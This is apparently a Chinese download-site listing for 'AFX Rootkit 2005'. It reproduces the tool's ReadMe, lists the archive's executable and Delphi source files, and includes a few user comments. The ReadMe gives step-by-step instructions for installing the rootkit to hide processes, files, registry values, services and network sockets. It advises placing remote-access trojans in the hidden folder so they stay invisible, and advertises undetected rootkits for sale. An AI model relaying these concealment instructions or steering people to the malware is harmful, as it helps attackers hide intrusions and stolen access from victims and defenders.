AFX Rootkit 2005 by Aphex
http://www.iamaphex.net
aphex@iamaphex.net
WARNING -> FOR WINDOWS NT/2000/XP/2003 ONLY!
This program patches Windows API to hide certain objects from being listed.
Current Version Hides:
a) Processes
b) Handles
c) Modules
d) Files & Folders
e) Registry Values
f) Services
g) TCP/UDP Sockets
h) Systray Icons
Configuring a computer with the rootkit is simple...
1. Create a new folder with a uniqiue name i.e. "c:\winnt\rewt\"
2. In this folder place the root.exe i.e. "c:\winnt\rewt\root.exe"
3. Execute root.exe with the "/i" parameter i.e. "start c:\winnt\rewt\root.exe /i"
4. Inside this folder place any other programs or files.
Everything inside the root folder is now invisible! If you place other services or programs
in the root folder they will be invisible from process/file/dll/handle/socket/etc listing.
However, all programs in the root folder can see each other.
Registry value names are hidden differently from everything else. The name must begin with the
root folder name followed by "\" and other characters i.e. "rewt\hiddenstartup1".
Also, the root folder is unique throughout the system. This means "c:\rewt\", "c:\winnt\rewt\"
and "c:\winnt\system32\rewt\" all will be hidden because they all share the root folder name "rewt".
So make sure you pick a good name!
NOTE: Most RATs have an install method that involves copying the EXE to a system folder, this is bad
because if the process is executed from outside the root folder it will be visible! If possible
disable this startup method.
Removal: Don't ask me for help on this! If you install it on yourself make sure you know how to remove it!
Method 1
1. Run the root.exe with the "/u" parameter
2. Delete all the files associated with it
3. Reboot
Method 2
1. Boot into safe mode
2. Locate the service with the root folder name
3. Remove the service and delete all the files associated with it
4. Reboot
ATTENTION!!
Undetected rootkits are on sale for $100 each. Payment by paypal, egold, western union, check or money order!
Contact aphex@iamaphex.net for purchase.
ATTENTION!!
没有合适的资源?快使用搜索试试~ 我知道了~
资源推荐
资源详情
资源评论
收起资源包目录
2005041211521525343.rar (13个子文件)
AFXRootkit2005
root1.exe 353KB
src
hook.dpr 36KB
JWaWinBase.pas 683KB
JwaWinType.pas 46KB
WinDefines.inc 3KB
JwaWinSvc.pas 72KB
JwaNtStatus.pas 243KB
Native.pas 150KB
root.dpr 6KB
JwaWinNT.pas 336KB
afxCodeHook.pas 32KB
RSRC.RC 21B
ReadMe.txt 2KB
共 13 条
- 1
资源评论
- www8062012-12-23打不开还显示有病毒!
- cigaiettes2013-05-27一般般...不知道下的是什么.
普通网友
- 粉丝: 882
- 资源: 2万+
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功